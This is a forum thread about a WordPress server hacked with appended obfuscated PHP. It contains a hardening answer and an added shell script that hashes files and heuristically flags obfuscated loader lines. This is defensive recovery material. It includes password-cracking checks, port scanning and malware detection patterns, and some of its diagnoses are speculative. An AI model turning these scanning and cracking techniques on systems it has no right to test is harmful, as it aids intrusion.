What should I do about hacked server?

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.

Obfuscated code has been appended to all files (including WP core/plugin/theme and non-WP stuff) for which the content begins with a php command (and not simply all files with a .php suffix).

It doesn’t seem to affect the rendered page, and what little I know suggests it’s a backdoor/trojan – which is about the limit of my knowledge.

Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).

I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.

I want to find the extent of the damage, the cause, and prevent a re-occurrence.

It’s fairly simple (though time consuming) to replace the obviously-changed files, and this I’ll do.

My sql db backups seem to be ‘clean’ – but I don’t know enough to be sure.

I’m perhaps wrongly assuming the cause to be WP-related, but don’t know if it might instead have been through password-guessing or other.

Constructive suggestions appreciated. Please and thanks.

Update: having been asked about the extra code, it’s added below. I didn’t originally include it, because it didn’t seem appropriate (not worth the effort of decoding, without which there is probably little to be gained).


2 Answers

My (managed) dedicated server, with several sites (not all of which use WP) has been hacked.

OK, it happens. Not the end of the world.


Today, I find permissions changed to 200 – which I suspect might have been done by my service provider (although I’ve not received notification, nor yet an answer to my ‘have you…?’ question).

It may be that someone tried to attack your service provider. It is quite uncommon to have the 200 user permission.

In Linux there are two methods to change the file.php permissions.

  • Symbolic method
  • Absolute Value method

The symbolic method is for geeks such as David MacKenzie, who wrote the chmod tool, and we will only speak in the absolute value method.

The permission of the following file:

-rwxrwxrwx  file.php

is 777.


Apparently your files were 200 like this:

--w-------  file.php

4 means Read,
2 means Write,
1 means Execute.

Looks like the hacker got your root access.


I’m curious about what the code does, although decoding it isn’t worthwhile as it’s clearly in some way ‘bad stuff’.

I would not bother with that. I would focus on recovery. Otherwise, you will just lose precious time.


I want to find the extent of the damage, the cause and prevent a re-occurrence.

Correct, I will focus only on prevention.

If your hosting provider doesn’t provide feedback that this was their fault, then this may be your fault.


Have you used the latest version of PHP?

Check out this URL and see that in 2016, 207 security flaws were found in PHP:
http://www.cvedetails.com/product/128/PHP-PHP.html?vendor_id=74

PHP is getting there, but you need to constantly upgrade the version.


Have you used software auto upgrades?

But not only PHP, you need to create automatic updates for the whole web server. This is very important.

Occasionally, there are new vulnerabilities found for the CentOS or Ubuntu you are running. And I was a witness to some great problems, just because the OS was not up to date with security updates.

In Ubuntu you would do something like

sudo apt-get update
sudo unattended-upgrade

somewhere in a cron job, or

unattended-upgrade --dry-run --debug

to test the upgrade.

If you would like upgrades to work as a service, you may try

dpkg-reconfigure unattended-upgrades

You would generally need to do that if your hosting company is not doing this automatically. Please check.


Have you used file change detection?

Part of the iThemes security plugin you already use is file change detection. This is very important to have set, since all the security analytics mention this is a key feature. However, from there you will need to pay attention to the files updated. It is important to keep the number of folders low and to set it not to inform you based on the extension of the files. Typically you don’t need to track images.

Did anyone find your log files?

Log files should be prohibited in general via .htaccess. If you are on Nginx, then in the Nginx config file. There are certain backup plugins that use wp-content to store the log files. Some of these do have a weak naming convention, and scouts may get your logs, with the information about your web server.

The extension of log files may not always be .log. It may be log.1 and the like. Keep that in mind.


Can WP SCAN detect your passwords and users?

Use WP SCAN tool and check if it can crack your passwords.

You may consider .htaccess rule to prevent WordPress username enumeration if you don’t have any side effects.

RewriteEngine On
# send ?author=N requests (username enumeration probes) to the site root
RewriteCond %{QUERY_STRING} author=\d
RewriteRule ^ /? [L,R=301]

Are your gates wide open?

You may consider closing your mysql port if this is open.

PORT      STATE   SERVICE
3306/tcp  open    mysql

Some services such as mysql should not have open ports, like in the example above. You will need to search the web for a good port scanner.

Also, your login form should have the login limit count, as well as your web server SSH and FTP channels.

Another gate is xmlrpc.php. If you don’t need that, you may try to eliminate it, because this would be the place where someone may try to log in.


Have you had a firewall .htaccess?

The sixth generation of the firewall from Perishable Press does not conflict with your .htaccess file at all. https://perishablepress.com/6g/

It includes removal of empty bots and bad bots. As I checked, it should work without interfering with the existing .htaccess rules.

You should test this at a low-traffic time, or on the development server, and possibly use all the tips from there. It should be easy, just copy and paste.


Have you used RIPS to test your plugins and themes?

This will allow you to scan plugins and themes from your http(s)://domain.com/rips/index.php

You can download it from here and extract it to the same level as WordPress:

Then check this out. The Query Monitor plugin is perfect, but for the other one the tool found security problems.
I tested nextgen-gallery and query-monitor plugins. Look what I found.


This tool may sometimes give you false positives, but in general, you will have the feedback.


So, the final advice for you.
You don’t know if your MySQL database is clean. You should probably export all the articles using standard WordPress export and create the new one.

You should install new plugins and a new theme. You may even start with a new clean VPS. On Linode this is just a few clicks.

You should start with a new WordPress installation for sure.

Probably you may even change the hosting if you determine they are not reliable.

The hosting provider may provide you some feedback from your web server logs if this is part of the service, so you can understand better what the problem was.

Anyhow — step by step.


Also, please check my other answer I provided to @Rahul, it may be good for prevention.
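As an added example (not code from the question or the answer above), a small POSIX shell helper covering two points raised on this page: a file-change baseline of the kind the answer recommends, and a heuristic sweep for files that begin with an opening PHP tag and carry a long appended obfuscated line, as the question describes. All paths and the sample loader line are constructed.

```shell
#!/bin/sh
# Added example, not part of the original question or answer: a small file-change
# baseline plus a heuristic sweep for obfuscated code appended to PHP files,
# to help scope the damage. All paths and sample data below are constructed.

# Record the SHA-256 of every .php file under $1 into the baseline file $2.
# Take the baseline from a known-clean tree (e.g. freshly reinstalled files).
baseline_hashes() {
    find "$1" -type f -name '*.php' -exec sha256sum {} + | sort -k2 > "$2"
}

# Compare the tree under $1 with baseline $2; print modified and new .php files.
changed_files() {
    # sha256sum -c prints "path: FAILED" for each file whose hash changed
    sha256sum -c --quiet "$2" 2>/dev/null | sed -n 's/: FAILED$//p'
    # files present now but absent from the baseline are new (possible droppers)
    find "$1" -type f -name '*.php' | while read -r f; do
        grep -qF " $f" "$2" || echo "$f"
    done
}

# Heuristic: files whose content starts with an opening PHP tag (the question's
# "begins with a php command") and that also carry a very long line using the
# decoding calls typical of appended loaders. Hits still need manual review.
suspect_php_files() {
    find "$1" -type f | while read -r f; do
        head -c 5 "$f" | grep -q '^<?php' || continue
        awk 'length($0) > 1000 && /chr\(|str_split\(|base64_decode\(/ { hit = 1 }
             END { exit !hit }' "$f" || continue
        echo "$f"
    done
}

# Demo on a constructed tree: one clean file, one with an appended loader line.
demo() {
    d=$(mktemp -d)
    printf '<?php echo "clean";\n' > "$d/a.php"
    printf '<?php echo "b";\n' > "$d/b.php"
    baseline_hashes "$d" "$d/baseline.sha256"
    # constructed, inert stand-in for the appended obfuscated code
    printf '@error_reporting(0);$z="%s";$c=chr(65);\n' "$(printf '%01200d' 0)" >> "$d/b.php"
    echo "changed:";  changed_files "$d" "$d/baseline.sha256"
    echo "suspect:";  suspect_php_files "$d"
    rm -rf "$d"
}
```

Run `demo` to see both functions flag the modified file; on a real server, take the baseline right after replacing the known-changed files and re-run `changed_files` from cron.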
